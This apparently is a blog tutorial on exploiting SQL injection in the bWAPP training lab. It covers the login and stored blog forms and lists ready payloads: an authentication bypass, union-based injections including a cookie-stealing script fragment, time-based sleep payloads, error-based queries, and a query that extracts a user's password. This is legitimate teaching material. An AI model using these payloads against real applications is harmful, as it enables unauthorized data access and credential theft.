As you already familiar with the subject SQL injections from the previous article part 1, we will quickly dive into exploitation with SQLi. Login to your bWAPP and select vulnerability SQL Injection (Login Form/Hero). As stated in previous post, we need to do some manual analysis to know the functionality and it’s implementation. Try to login with your some random text (test, test). Now let’s do some dynamic analysis by reviewing source code of the functionality.
This constructed statement leads to SQLi vulnerability. It’s quite easy to break the statement with single quote and boolean condition which is error based sqli
Attack vector: test’ or 1=1–
You may try other type SQL injections Union based, Time based
Here’re the examples of attack
Union Based:
1) test’ UNION ALL SELECT NULL,CONCAT(0x3a6a62713a,0x427547556778516a7957,0x3a6e6b6c3a),NULL,NULL#
2) test’ union select 1,1,1,1–
3) test’ union select 1,’IronMan’,1,’You are hacked!’–
4) test’ union select 1,’IronMan’,1,’alert(document.cookie)Hacked!’–
Time Based:
1) test’ / sleep(15) / ‘
2) test’ AND (SELECT * FROM (SELECT(SLEEP(5)))rGVc) AND ‘Wnfm’=’Wnfm
Now let’s break another functionality, select SQL Injection – Stored (Blog) in bWAPP
Again do the analysis, check the source code to know the implementation.
Okay, now it’s an Insert statement being used. So, the malicious input would also gets stored in the database. Try inserting a single quote
So try all types of SQL injections (Error based, Union based, Time based). If you’re vexed up doing this manually then use Burp Repeater to resend the request or ZAP, SQLMap for automated scan of this request.
Attacks:
1) blah’,(select password from heroes where login=’neo’))–
2) Yo yo ‘ / sleep(15) / ‘
3) Yo yo ‘ AND (SELECT 3335 FROM(SELECT COUNT(*),CONCAT(0x3a6a62713a,(SELECT (ELT(3335=3335,1))),0x3a6e6b6c3a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND ‘dIgi’=’dIgi
Try all other functionalities in bWAPP. I hope now you’ve a good understanding on SQL injections. I’ll post cheat sheet soon. If you think that I miss anything then please post a comment below.
Here’s the reference: https://www.owasp.org/index.php/SQL_Injection
How to review the source code: https://www.owasp.org/index.php/Reviewing_Code_for_SQL_Injection